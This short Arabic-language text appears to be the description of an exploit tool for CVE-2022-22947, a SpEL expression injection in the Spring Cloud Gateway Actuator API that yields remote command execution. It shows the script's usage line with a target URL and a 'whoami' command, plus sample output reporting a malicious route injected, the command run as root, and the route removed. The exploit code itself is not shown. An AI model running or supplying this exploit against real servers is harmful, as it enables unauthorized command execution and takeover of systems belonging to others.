
Spring Cloud Gateway Actuator API SpEL حقن التعبير واستغلال تنفيذ الأوامر Exp
Spring Cloud Gateway Actuator API SpEL تعبير حقن تنفيذ الأوامر Exp
استخدام:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" النتيجة: إضافة مسار تعبير SpEL خبيث ناجحة! تحديث المسار ناجح! الحصول على نتيجة الهجوم ناجح:
================================================ root
================================================ تم حذف المسار الخبيث! تحديث المسار ناجح!